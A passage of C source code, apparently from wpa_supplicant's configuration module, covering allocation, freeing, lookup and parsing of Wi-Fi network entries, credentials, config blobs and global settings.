os_free(cred->domain_suffix_match); os_free(cred->eap_method); os_free(cred->phase1); os_free(cred->phase2); os_free(cred->excluded_ssid); os_free(cred->roaming_partner); os_free(cred->provisioning_sp); for (i = 0; i < cred->num_req_conn_capab; i++) os_free(cred->req_conn_capab_port[i]); os_free(cred->req_conn_capab_port); os_free(cred->req_conn_capab_proto); os_free(cred); } void wpa_config_flush_blobs(struct wpa_config *config) { #ifndef CONFIG_NO_CONFIG_BLOBS struct wpa_config_blob *blob, *prev; blob = config->blobs; config->blobs = NULL; while (blob) { prev = blob; blob = blob->next; wpa_config_free_blob(prev); } #endif /* CONFIG_NO_CONFIG_BLOBS */ } /** * wpa_config_free - Free configuration data * @config: Configuration data from wpa_config_read() * * This function frees all resources allocated for the configuration data by * wpa_config_read(). */ void wpa_config_free(struct wpa_config *config) { struct wpa_ssid *ssid, *prev = NULL; struct wpa_cred *cred, *cprev; ssid = config->ssid; while (ssid) { prev = ssid; ssid = ssid->next; wpa_config_free_ssid(prev); } cred = config->cred; while (cred) { cprev = cred; cred = cred->next; wpa_config_free_cred(cprev); } wpa_config_flush_blobs(config); wpabuf_free(config->wps_vendor_ext_m1); os_free(config->ctrl_interface); os_free(config->ctrl_interface_group); os_free(config->opensc_engine_path); os_free(config->pkcs11_engine_path); os_free(config->pkcs11_module_path); os_free(config->openssl_ciphers); os_free(config->pcsc_reader); str_clear_free(config->pcsc_pin); os_free(config->driver_param); os_free(config->device_name); os_free(config->manufacturer); os_free(config->model_name); os_free(config->model_number); os_free(config->serial_number); os_free(config->config_methods); os_free(config->p2p_ssid_postfix); os_free(config->pssid); os_free(config->p2p_pref_chan); os_free(config->p2p_no_go_freq.range); os_free(config->autoscan); os_free(config->freq_list); wpabuf_free(config->wps_nfc_dh_pubkey); wpabuf_free(config->wps_nfc_dh_privkey); wpabuf_free(config->wps_nfc_dev_pw); os_free(config->ext_password_backend); os_free(config->sae_groups); wpabuf_free(config->ap_vendor_elements); os_free(config->osu_dir); os_free(config->wowlan_triggers); os_free(config); } /** * wpa_config_foreach_network - Iterate over each configured network * @config: Configuration data from wpa_config_read() * @func: Callback function to process each network * @arg: Opaque argument to pass to callback function * * Iterate over the set of configured networks calling the specified * function for each item. We guard against callbacks removing the * supplied network. */ void wpa_config_foreach_network(struct wpa_config *config, void (*func)(void *, struct wpa_ssid *), void *arg) { struct wpa_ssid *ssid, *next; ssid = config->ssid; while (ssid) { next = ssid->next; func(arg, ssid); ssid = next; } } /** * wpa_config_get_network - Get configured network based on id * @config: Configuration data from wpa_config_read() * @id: Unique network id to search for * Returns: Network configuration or %NULL if not found */ struct wpa_ssid * wpa_config_get_network(struct wpa_config *config, int id) { struct wpa_ssid *ssid; ssid = config->ssid; while (ssid) { if (id == ssid->id) break; ssid = ssid->next; } return ssid; } /** * wpa_config_add_network - Add a new network with empty configuration * @config: Configuration data from wpa_config_read() * Returns: The new network configuration or %NULL if operation failed */ struct wpa_ssid * wpa_config_add_network(struct wpa_config *config) { int id; struct wpa_ssid *ssid, *last = NULL; id = -1; ssid = config->ssid; while (ssid) { if (ssid->id > id) id = ssid->id; last = ssid; ssid = ssid->next; } id++; ssid = os_zalloc(sizeof(*ssid)); if (ssid == NULL) return NULL; ssid->id = id; dl_list_init(&ssid->psk_list); if (last) last->next = ssid; else config->ssid = ssid; wpa_config_update_prio_list(config); return ssid; } /** * wpa_config_remove_network - Remove a configured network based on id * @config: Configuration data from wpa_config_read() * @id: Unique network id to search for * Returns: 0 on success, or -1 if the network was not found */ int wpa_config_remove_network(struct wpa_config *config, int id) { struct wpa_ssid *ssid, *prev = NULL; ssid = config->ssid; while (ssid) { if (id == ssid->id) break; prev = ssid; ssid = ssid->next; } if (ssid == NULL) return -1; if (prev) prev->next = ssid->next; else config->ssid = ssid->next; wpa_config_update_prio_list(config); wpa_config_free_ssid(ssid); return 0; } /** * wpa_config_set_network_defaults - Set network default values * @ssid: Pointer to network configuration data */ void wpa_config_set_network_defaults(struct wpa_ssid *ssid) { ssid->proto = DEFAULT_PROTO; ssid->pairwise_cipher = DEFAULT_PAIRWISE; ssid->group_cipher = DEFAULT_GROUP; ssid->key_mgmt = DEFAULT_KEY_MGMT; ssid->bg_scan_period = DEFAULT_BG_SCAN_PERIOD; #ifdef IEEE8021X_EAPOL ssid->eapol_flags = DEFAULT_EAPOL_FLAGS; ssid->eap_workaround = DEFAULT_EAP_WORKAROUND; ssid->eap.fragment_size = DEFAULT_FRAGMENT_SIZE; ssid->eap.sim_num = DEFAULT_USER_SELECTED_SIM; #endif /* IEEE8021X_EAPOL */ #ifdef CONFIG_HT_OVERRIDES ssid->disable_ht = DEFAULT_DISABLE_HT; ssid->disable_ht40 = DEFAULT_DISABLE_HT40; ssid->disable_sgi = DEFAULT_DISABLE_SGI; ssid->disable_ldpc = DEFAULT_DISABLE_LDPC; ssid->disable_max_amsdu = DEFAULT_DISABLE_MAX_AMSDU; ssid->ampdu_factor = DEFAULT_AMPDU_FACTOR; ssid->ampdu_density = DEFAULT_AMPDU_DENSITY; #endif /* CONFIG_HT_OVERRIDES */ #ifdef CONFIG_VHT_OVERRIDES ssid->vht_rx_mcs_nss_1 = -1; ssid->vht_rx_mcs_nss_2 = -1; ssid->vht_rx_mcs_nss_3 = -1; ssid->vht_rx_mcs_nss_4 = -1; ssid->vht_rx_mcs_nss_5 = -1; ssid->vht_rx_mcs_nss_6 = -1; ssid->vht_rx_mcs_nss_7 = -1; ssid->vht_rx_mcs_nss_8 = -1; ssid->vht_tx_mcs_nss_1 = -1; ssid->vht_tx_mcs_nss_2 = -1; ssid->vht_tx_mcs_nss_3 = -1; ssid->vht_tx_mcs_nss_4 = -1; ssid->vht_tx_mcs_nss_5 = -1; ssid->vht_tx_mcs_nss_6 = -1; ssid->vht_tx_mcs_nss_7 = -1; ssid->vht_tx_mcs_nss_8 = -1; #endif /* CONFIG_VHT_OVERRIDES */ ssid->proactive_key_caching = -1; #ifdef CONFIG_IEEE80211W ssid->ieee80211w = MGMT_FRAME_PROTECTION_DEFAULT; #endif /* CONFIG_IEEE80211W */ ssid->mac_addr = -1; } /** * wpa_config_set - Set a variable in network configuration * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * @value: Variable value * @line: Line number in configuration file or 0 if not used * Returns: 0 on success, -1 on failure * * This function can be used to set network configuration variables based on * both the configuration file and management interface input. The value * parameter must be in the same format as the text-based configuration file is * using. For example, strings are using double quotation marks. */ int wpa_config_set(struct wpa_ssid *ssid, const char *var, const char *value, int line) { size_t i; int ret = 0; if (ssid == NULL || var == NULL || value == NULL) return -1; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) != 0) continue; if (field->parser(field, ssid, line, value)) { if (line) { wpa_printf(MSG_ERROR, "Line %d: failed to " "parse %s '%s'.", line, var, value); } ret = -1; } break; } if (i == NUM_SSID_FIELDS) { if (line) { wpa_printf(MSG_ERROR, "Line %d: unknown network field " "'%s'.", line, var); } ret = -1; } return ret; } int wpa_config_set_quoted(struct wpa_ssid *ssid, const char *var, const char *value) { size_t len; char *buf; int ret; len = os_strlen(value); buf = os_malloc(len + 3); if (buf == NULL) return -1; buf[0] = '"'; os_memcpy(buf + 1, value, len); buf[len + 1] = '"'; buf[len + 2] = '\0'; ret = wpa_config_set(ssid, var, buf, 0); os_free(buf); return ret; } /** * wpa_config_get_all - Get all options from network configuration * @ssid: Pointer to network configuration data * @get_keys: Determines if keys/passwords will be included in returned list * (if they may be exported) * Returns: %NULL terminated list of all set keys and their values in the form * of [key1, val1, key2, val2, ... , NULL] * * This function can be used to get list of all configured network properties. * The caller is responsible for freeing the returned list and all its * elements. */ char ** wpa_config_get_all(struct wpa_ssid *ssid, int get_keys) { const struct parse_data *field; char *key, *value; size_t i; char **props; int fields_num; get_keys = get_keys && ssid->export_keys; props = os_calloc(2 * NUM_SSID_FIELDS + 1, sizeof(char *)); if (!props) return NULL; fields_num = 0; for (i = 0; i < NUM_SSID_FIELDS; i++) { field = &ssid_fields[i]; if (field->key_data && !get_keys) continue; value = field->writer(field, ssid); if (value == NULL) continue; if (os_strlen(value) == 0) { os_free(value); continue; } key = os_strdup(field->name); if (key == NULL) { os_free(value); goto err; } props[fields_num * 2] = key; props[fields_num * 2 + 1] = value; fields_num++; } return props; err: value = *props; while (value) os_free(value++); os_free(props); return NULL; } #ifndef NO_CONFIG_WRITE /** * wpa_config_get - Get a variable in network configuration * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * Returns: Value of the variable or %NULL on failure * * This function can be used to get network configuration variables. The * returned value is a copy of the configuration variable in text format, i.e,. * the same format that the text-based configuration file and wpa_config_set() * are using for the value. The caller is responsible for freeing the returned * value. */ char * wpa_config_get(struct wpa_ssid *ssid, const char *var) { size_t i; if (ssid == NULL || var == NULL) return NULL; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) == 0) return field->writer(field, ssid); } return NULL; } /** * wpa_config_get_no_key - Get a variable in network configuration (no keys) * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * Returns: Value of the variable or %NULL on failure * * This function can be used to get network configuration variable like * wpa_config_get(). The only difference is that this functions does not expose * key/password material from the configuration. In case a key/password field * is requested, the returned value is an empty string or %NULL if the variable * is not set or "*" if the variable is set (regardless of its value). The * returned value is a copy of the configuration variable in text format, i.e,. * the same format that the text-based configuration file and wpa_config_set() * are using for the value. The caller is responsible for freeing the returned * value. */ char * wpa_config_get_no_key(struct wpa_ssid *ssid, const char *var) { size_t i; if (ssid == NULL || var == NULL) return NULL; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) == 0) { char *res = field->writer(field, ssid); if (field->key_data) { if (res && res[0]) { wpa_printf(MSG_DEBUG, "Do not allow " "key_data field to be " "exposed"); str_clear_free(res); return os_strdup("*"); } os_free(res); return NULL; } return res; } } return NULL; } #endif /* NO_CONFIG_WRITE */ /** * wpa_config_update_psk - Update WPA PSK based on passphrase and SSID * @ssid: Pointer to network configuration data * * This function must be called to update WPA PSK when either SSID or the * passphrase has changed for the network configuration. */ void wpa_config_update_psk(struct wpa_ssid *ssid) { #ifndef CONFIG_NO_PBKDF2 pbkdf2_sha1(ssid->passphrase, ssid->ssid, ssid->ssid_len, 4096, ssid->psk, PMK_LEN); wpa_hexdump_key(MSG_MSGDUMP, "PSK (from passphrase)", ssid->psk, PMK_LEN); ssid->psk_set = 1; #endif /* CONFIG_NO_PBKDF2 */ } static int wpa_config_set_cred_req_conn_capab(struct wpa_cred *cred, const char *value) { u8 *proto; int **port; int *ports, *nports; const char *pos; unsigned int num_ports; proto = os_realloc_array(cred->req_conn_capab_proto, cred->num_req_conn_capab + 1, sizeof(u8)); if (proto == NULL) return -1; cred->req_conn_capab_proto = proto; port = os_realloc_array(cred->req_conn_capab_port, cred->num_req_conn_capab + 1, sizeof(int *)); if (port == NULL) return -1; cred->req_conn_capab_port = port; proto[cred->num_req_conn_capab] = atoi(value); pos = os_strchr(value, ':'); if (pos == NULL) { port[cred->num_req_conn_capab] = NULL; cred->num_req_conn_capab++; return 0; } pos++; ports = NULL; num_ports = 0; while (*pos) { nports = os_realloc_array(ports, num_ports + 1, sizeof(int)); if (nports == NULL) { os_free(ports); return -1; } ports = nports; ports[num_ports++] = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) break; pos++; } nports = os_realloc_array(ports, num_ports + 1, sizeof(int)); if (nports == NULL) { os_free(ports); return -1; } ports = nports; ports[num_ports] = -1; port[cred->num_req_conn_capab] = ports; cred->num_req_conn_capab++; return 0; } int wpa_config_set_cred(struct wpa_cred *cred, const char *var, const char *value, int line) { char *val; size_t len; if (os_strcmp(var, "temporary") == 0) { cred->temporary = atoi(value); return 0; } if (os_strcmp(var, "priority") == 0) { cred->priority = atoi(value); return 0; } if (os_strcmp(var, "sp_priority") == 0) { int prio = atoi(value); if (prio < 0 || prio > 255) return -1; cred->sp_priority = prio; return 0; } if (os_strcmp(var, "pcsc") == 0) { cred->pcsc = atoi(value); return 0; } if (os_strcmp(var, "eap") == 0) { struct eap_method_type method; method.method = eap_peer_get_type(value, &method.vendor); if (method.vendor == EAP_VENDOR_IETF && method.method == EAP_TYPE_NONE) { wpa_printf(MSG_ERROR, "Line %d: unknown EAP type '%s' " "for a credential", line, value); return -1; } os_free(cred->eap_method); cred->eap_method = os_malloc(sizeof(*cred->eap_method)); if (cred->eap_method == NULL) return -1; os_memcpy(cred->eap_method, &method, sizeof(method)); return 0; } if (os_strcmp(var, "password") == 0 && os_strncmp(value, "ext:", 4) == 0) { str_clear_free(cred->password); cred->password = os_strdup(value); cred->ext_password = 1; return 0; } if (os_strcmp(var, "update_identifier") == 0) { cred->update_identifier = atoi(value); return 0; } if (os_strcmp(var, "min_dl_bandwidth_home") == 0) { cred->min_dl_bandwidth_home = atoi(value); return 0; } if (os_strcmp(var, "min_ul_bandwidth_home") == 0) { cred->min_ul_bandwidth_home = atoi(value); return 0; } if (os_strcmp(var, "min_dl_bandwidth_roaming") == 0) { cred->min_dl_bandwidth_roaming = atoi(value); return 0; } if (os_strcmp(var, "min_ul_bandwidth_roaming") == 0) { cred->min_ul_bandwidth_roaming = atoi(value); return 0; } if (os_strcmp(var, "max_bss_load") == 0) { cred->max_bss_load = atoi(value); return 0; } if (os_strcmp(var, "req_conn_capab") == 0) return wpa_config_set_cred_req_conn_capab(cred, value); if (os_strcmp(var, "ocsp") == 0) { cred->ocsp = atoi(value); return 0; } if (os_strcmp(var, "sim_num") == 0) { cred->sim_num = atoi(value); return 0; } val = wpa_config_parse_string(value, &len); if (val == NULL) { wpa_printf(MSG_ERROR, "Line %d: invalid field '%s' string " "value '%s'.", line, var, value); return -1; } if (os_strcmp(var, "realm") == 0) { os_free(cred->realm); cred->realm = val; return 0; } if (os_strcmp(var, "username") == 0) { str_clear_free(cred->username); cred->username = val; return 0; } if (os_strcmp(var, "password") == 0) { str_clear_free(cred->password); cred->password = val; cred->ext_password = 0; return 0; } if (os_strcmp(var, "ca_cert") == 0) { os_free(cred->ca_cert); cred->ca_cert = val; return 0; } if (os_strcmp(var, "client_cert") == 0) { os_free(cred->client_cert); cred->client_cert = val; return 0; } if (os_strcmp(var, "private_key") == 0) { os_free(cred->private_key); cred->private_key = val; return 0; } if (os_strcmp(var, "private_key_passwd") == 0) { str_clear_free(cred->private_key_passwd); cred->private_key_passwd = val; return 0; } if (os_strcmp(var, "imsi") == 0) { os_free(cred->imsi); cred->imsi = val; return 0; } if (os_strcmp(var, "milenage") == 0) { str_clear_free(cred->milenage); cred->milenage = val; return 0; } if (os_strcmp(var, "domain_suffix_match") == 0) { os_free(cred->domain_suffix_match); cred->domain_suffix_match = val; return 0; } if (os_strcmp(var, "domain") == 0) { char **new_domain; new_domain = os_realloc_array(cred->domain, cred->num_domain + 1, sizeof(char *)); if (new_domain == NULL) { os_free(val); return -1; } new_domain[cred->num_domain++] = val; cred->domain = new_domain; return 0; } if (os_strcmp(var, "phase1") == 0) { os_free(cred->phase1); cred->phase1 = val; return 0; } if (os_strcmp(var, "phase2") == 0) { os_free(cred->phase2); cred->phase2 = val; return 0; } if (os_strcmp(var, "roaming_consortium") == 0) { if (len < 3 || len > sizeof(cred->roaming_consortium)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "roaming_consortium length %d (3..15 " "expected)", line, (int) len); os_free(val); return -1; } os_memcpy(cred->roaming_consortium, val, len); cred->roaming_consortium_len = len; os_free(val); return 0; } if (os_strcmp(var, "required_roaming_consortium") == 0) { if (len < 3 || len > sizeof(cred->required_roaming_consortium)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "required_roaming_consortium length %d " "(3..15 expected)", line, (int) len); os_free(val); return -1; } os_memcpy(cred->required_roaming_consortium, val, len); cred->required_roaming_consortium_len = len; os_free(val); return 0; } if (os_strcmp(var, "excluded_ssid") == 0) { struct excluded_ssid *e; if (len > MAX_SSID_LEN) { wpa_printf(MSG_ERROR, "Line %d: invalid " "excluded_ssid length %d", line, (int) len); os_free(val); return -1; } e = os_realloc_array(cred->excluded_ssid, cred->num_excluded_ssid + 1, sizeof(struct excluded_ssid)); if (e == NULL) { os_free(val); return -1; } cred->excluded_ssid = e; e = &cred->excluded_ssid[cred->num_excluded_ssid++]; os_memcpy(e->ssid, val, len); e->ssid_len = len; os_free(val); return 0; } if (os_strcmp(var, "roaming_partner") == 0) { struct roaming_partner *p; char *pos; p = os_realloc_array(cred->roaming_partner, cred->num_roaming_partner + 1, sizeof(struct roaming_partner)); if (p == NULL) { os_free(val); return -1; } cred->roaming_partner = p; p = &cred->roaming_partner[cred->num_roaming_partner]; pos = os_strchr(val, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; if (pos - val - 1 >= (int) sizeof(p->fqdn)) { os_free(val); return -1; } os_memcpy(p->fqdn, val, pos - val); p->exact_match = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; p->priority = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; if (os_strlen(pos) >= sizeof(p->country)) { os_free(val); return -1; } os_memcpy(p->country, pos, os_strlen(pos) + 1); cred->num_roaming_partner++; os_free(val); return 0; } if (os_strcmp(var, "provisioning_sp") == 0) { os_free(cred->provisioning_sp); cred->provisioning_sp = val; return 0; } if (line) { wpa_printf(MSG_ERROR, "Line %d: unknown cred field '%s'.", line, var); } os_free(val); return -1; } static char * alloc_int_str(int val) { char *buf; buf = os_malloc(20); if (buf == NULL) return NULL; os_snprintf(buf, 20, "%d", val); return buf; } static char * alloc_strdup(const char *str) { if (str == NULL) return NULL; return os_strdup(str); } char * wpa_config_get_cred_no_key(struct wpa_cred *cred, const char *var) { if (os_strcmp(var, "temporary") == 0) return alloc_int_str(cred->temporary); if (os_strcmp(var, "priority") == 0) return alloc_int_str(cred->priority); if (os_strcmp(var, "sp_priority") == 0) return alloc_int_str(cred->sp_priority); if (os_strcmp(var, "pcsc") == 0) return alloc_int_str(cred->pcsc); if (os_strcmp(var, "eap") == 0) { if (!cred->eap_method) return NULL; return alloc_strdup(eap_get_name(cred->eap_method[0].vendor, cred->eap_method[0].method)); } if (os_strcmp(var, "update_identifier") == 0) return alloc_int_str(cred->update_identifier); if (os_strcmp(var, "min_dl_bandwidth_home") == 0) return alloc_int_str(cred->min_dl_bandwidth_home); if (os_strcmp(var, "min_ul_bandwidth_home") == 0) return alloc_int_str(cred->min_ul_bandwidth_home); if (os_strcmp(var, "min_dl_bandwidth_roaming") == 0) return alloc_int_str(cred->min_dl_bandwidth_roaming); if (os_strcmp(var, "min_ul_bandwidth_roaming") == 0) return alloc_int_str(cred->min_ul_bandwidth_roaming); if (os_strcmp(var, "max_bss_load") == 0) return alloc_int_str(cred->max_bss_load); if (os_strcmp(var, "req_conn_capab") == 0) { unsigned int i; char *buf, *end, *pos; int ret; if (!cred->num_req_conn_capab) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_req_conn_capab; i++) { int *ports; ret = os_snprintf(pos, end - pos, "%s%u", i > 0 ? "\n" : "", cred->req_conn_capab_proto[i]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; ports = cred->req_conn_capab_port[i]; if (ports) { int j; for (j = 0; ports[j] != -1; j++) { ret = os_snprintf(pos, end - pos, "%s%d", j > 0 ? "," : ":", ports[j]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } } } return buf; } if (os_strcmp(var, "ocsp") == 0) return alloc_int_str(cred->ocsp); if (os_strcmp(var, "realm") == 0) return alloc_strdup(cred->realm); if (os_strcmp(var, "username") == 0) return alloc_strdup(cred->username); if (os_strcmp(var, "password") == 0) { if (!cred->password) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "ca_cert") == 0) return alloc_strdup(cred->ca_cert); if (os_strcmp(var, "client_cert") == 0) return alloc_strdup(cred->client_cert); if (os_strcmp(var, "private_key") == 0) return alloc_strdup(cred->private_key); if (os_strcmp(var, "private_key_passwd") == 0) { if (!cred->private_key_passwd) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "imsi") == 0) return alloc_strdup(cred->imsi); if (os_strcmp(var, "milenage") == 0) { if (!(cred->milenage)) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "domain_suffix_match") == 0) return alloc_strdup(cred->domain_suffix_match); if (os_strcmp(var, "domain") == 0) { unsigned int i; char *buf, *end, *pos; int ret; if (!cred->num_domain) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_domain; i++) { ret = os_snprintf(pos, end - pos, "%s%s", i > 0 ? "\n" : "", cred->domain[i]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "phase1") == 0) return alloc_strdup(cred->phase1); if (os_strcmp(var, "phase2") == 0) return alloc_strdup(cred->phase2); if (os_strcmp(var, "roaming_consortium") == 0) { size_t buflen; char *buf; if (!cred->roaming_consortium_len) return NULL; buflen = cred->roaming_consortium_len * 2 + 1; buf = os_malloc(buflen); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, buflen, cred->roaming_consortium, cred->roaming_consortium_len); return buf; } if (os_strcmp(var, "required_roaming_consortium") == 0) { size_t buflen; char *buf; if (!cred->required_roaming_consortium_len) return NULL; buflen = cred->required_roaming_consortium_len * 2 + 1; buf = os_malloc(buflen); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, buflen, cred->required_roaming_consortium, cred->required_roaming_consortium_len); return buf; } if (os_strcmp(var, "excluded_ssid") == 0) { unsigned int i; char *buf, *end, *pos; if (!cred->num_excluded_ssid) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_excluded_ssid; i++) { struct excluded_ssid *e; int ret; e = &cred->excluded_ssid[i]; ret = os_snprintf(pos, end - pos, "%s%s", i > 0 ? "\n" : "", wpa_ssid_txt(e->ssid, e->ssid_len)); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "roaming_partner") == 0) { unsigned int i; char *buf, *end, *pos; if (!cred->num_roaming_partner) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_roaming_partner; i++) { struct roaming_partner *p; int ret; p = &cred->roaming_partner[i]; ret = os_snprintf(pos, end - pos, "%s%s,%d,%u,%s", i > 0 ? "\n" : "", p->fqdn, p->exact_match, p->priority, p->country); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "provisioning_sp") == 0) return alloc_strdup(cred->provisioning_sp); return NULL; } struct wpa_cred * wpa_config_get_cred(struct wpa_config *config, int id) { struct wpa_cred *cred; cred = config->cred; while (cred) { if (id == cred->id) break; cred = cred->next; } return cred; } struct wpa_cred * wpa_config_add_cred(struct wpa_config *config) { int id; struct wpa_cred *cred, *last = NULL; id = -1; cred = config->cred; while (cred) { if (cred->id > id) id = cred->id; last = cred; cred = cred->next; } id++; cred = os_zalloc(sizeof(*cred)); if (cred == NULL) return NULL; cred->id = id; cred->sim_num = DEFAULT_USER_SELECTED_SIM; if (last) last->next = cred; else config->cred = cred; return cred; } int wpa_config_remove_cred(struct wpa_config *config, int id) { struct wpa_cred *cred, *prev = NULL; cred = config->cred; while (cred) { if (id == cred->id) break; prev = cred; cred = cred->next; } if (cred == NULL) return -1; if (prev) prev->next = cred->next; else config->cred = cred->next; wpa_config_free_cred(cred); return 0; } #ifndef CONFIG_NO_CONFIG_BLOBS /** * wpa_config_get_blob - Get a named configuration blob * @config: Configuration data from wpa_config_read() * @name: Name of the blob * Returns: Pointer to blob data or %NULL if not found */ const struct wpa_config_blob * wpa_config_get_blob(struct wpa_config *config, const char *name) { struct wpa_config_blob *blob = config->blobs; while (blob) { if (os_strcmp(blob->name, name) == 0) return blob; blob = blob->next; } return NULL; } /** * wpa_config_set_blob - Set or add a named configuration blob * @config: Configuration data from wpa_config_read() * @blob: New value for the blob * * Adds a new configuration blob or replaces the current value of an existing * blob. */ void wpa_config_set_blob(struct wpa_config *config, struct wpa_config_blob *blob) { wpa_config_remove_blob(config, blob->name); blob->next = config->blobs; config->blobs = blob; } /** * wpa_config_free_blob - Free blob data * @blob: Pointer to blob to be freed */ void wpa_config_free_blob(struct wpa_config_blob *blob) { if (blob) { os_free(blob->name); bin_clear_free(blob->data, blob->len); os_free(blob); } } /** * wpa_config_remove_blob - Remove a named configuration blob * @config: Configuration data from wpa_config_read() * @name: Name of the blob to remove * Returns: 0 if blob was removed or -1 if blob was not found */ int wpa_config_remove_blob(struct wpa_config *config, const char *name) { struct wpa_config_blob *pos = config->blobs, *prev = NULL; while (pos) { if (os_strcmp(pos->name, name) == 0) { if (prev) prev->next = pos->next; else config->blobs = pos->next; wpa_config_free_blob(pos); return 0; } prev = pos; pos = pos->next; } return -1; } #endif /* CONFIG_NO_CONFIG_BLOBS */ /** * wpa_config_alloc_empty - Allocate an empty configuration * @ctrl_interface: Control interface parameters, e.g., path to UNIX domain * socket * @driver_param: Driver parameters * Returns: Pointer to allocated configuration data or %NULL on failure */ struct wpa_config * wpa_config_alloc_empty(const char *ctrl_interface, const char *driver_param) { struct wpa_config *config; const int aCWmin = 4, aCWmax = 10; const struct hostapd_wmm_ac_params ac_bk = { aCWmin, aCWmax, 7, 0, 0 }; /* background traffic */ const struct hostapd_wmm_ac_params ac_be = { aCWmin, aCWmax, 3, 0, 0 }; /* best effort traffic */ const struct hostapd_wmm_ac_params ac_vi = /* video traffic */ { aCWmin - 1, aCWmin, 2, 3000 / 32, 0 }; const struct hostapd_wmm_ac_params ac_vo = /* voice traffic */ { aCWmin - 2, aCWmin - 1, 2, 1500 / 32, 0 }; config = os_zalloc(sizeof(*config)); if (config == NULL) return NULL; config->eapol_version = DEFAULT_EAPOL_VERSION; config->ap_scan = DEFAULT_AP_SCAN; config->fast_reauth = DEFAULT_FAST_REAUTH; config->p2p_go_intent = DEFAULT_P2P_GO_INTENT; config->p2p_intra_bss = DEFAULT_P2P_INTRA_BSS; config->p2p_go_max_inactivity = DEFAULT_P2P_GO_MAX_INACTIVITY; config->p2p_optimize_listen_chan = DEFAULT_P2P_OPTIMIZE_LISTEN_CHAN; config->bss_max_count = DEFAULT_BSS_MAX_COUNT; config->bss_expiration_age = DEFAULT_BSS_EXPIRATION_AGE; config->bss_expiration_scan_count = DEFAULT_BSS_EXPIRATION_SCAN_COUNT; config->max_num_sta = DEFAULT_MAX_NUM_STA; config->access_network_type = DEFAULT_ACCESS_NETWORK_TYPE; config->scan_cur_freq = DEFAULT_SCAN_CUR_FREQ; config->wmm_ac_params[0] = ac_be; config->wmm_ac_params[1] = ac_bk; config->wmm_ac_params[2] = ac_vi; config->wmm_ac_params[3] = ac_vo; config->p2p_search_delay = DEFAULT_P2P_SEARCH_DELAY; config->rand_addr_lifetime = DEFAULT_RAND_ADDR_LIFETIME; if (ctrl_interface) config->ctrl_interface = os_strdup(ctrl_interface); if (driver_param) config->driver_param = os_strdup(driver_param); return config; } #ifndef CONFIG_NO_STDOUT_DEBUG /** * wpa_config_debug_dump_networks - Debug dump of configured networks * @config: Configuration data from wpa_config_read() */ void wpa_config_debug_dump_networks(struct wpa_config *config) { int prio; struct wpa_ssid *ssid; for (prio = 0; prio < config->num_prio; prio++) { ssid = config->pssid[prio]; wpa_printf(MSG_DEBUG, "Priority group %d", ssid->priority); while (ssid) { wpa_printf(MSG_DEBUG, " id=%d ssid='%s'", ssid->id, wpa_ssid_txt(ssid->ssid, ssid->ssid_len)); ssid = ssid->pnext; } } } #endif /* CONFIG_NO_STDOUT_DEBUG */ struct global_parse_data { char *name; int (*parser)(const struct global_parse_data *data, struct wpa_config *config, int line, const char *value); void *param1, *param2, *param3; unsigned int changed_flag; }; static int wpa_global_config_parse_int(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int val, *dst; char *end; dst = (int *) (((u8 *) config) + (long) data->param1); val = strtol(pos, &end, 0); if (*end) { wpa_printf(MSG_ERROR, "Line %d: invalid number \"%s\"", line, pos); return -1; } *dst = val; wpa_printf(MSG_DEBUG, "%s=%d", data->name, *dst); if (data->param2 && *dst < (long) data->param2) { wpa_printf(MSG_ERROR, "Line %d: too small %s (value=%d " "min_value=%ld)", line, data->name, *dst, (long) data->param2); *dst = (long) data->param2; return -1; } if (data->param3 && *dst > (long) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too large %s (value=%d " "max_value=%ld)", line, data->name, *dst, (long) data->param3); *dst = (long) data->param3; return -1; } return 0; } static int wpa_global_config_parse_str(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; char **dst, *tmp; len = os_strlen(pos); if (data->param2 && len < (size_t) data->param2) { wpa_printf(MSG_ERROR, "Line %d: too short %s (len=%lu " "min_len=%ld)", line, data->name, (unsigned long) len, (long) data->param2); return -1; } if (data->param3 && len > (size_t) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too long %s (len=%lu " "max_len=%ld)", line, data->name, (unsigned long) len, (long) data->param3); return -1; } tmp = os_strdup(pos); if (tmp == NULL) return -1; dst = (char **) (((u8 *) config) + (long) data->param1); os_free(*dst); *dst = tmp; wpa_printf(MSG_DEBUG, "%s='%s'", data->name, *dst); return 0; } static int wpa_config_process_bgscan(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; char *tmp; int res; tmp = wpa_config_parse_string(pos, &len); if 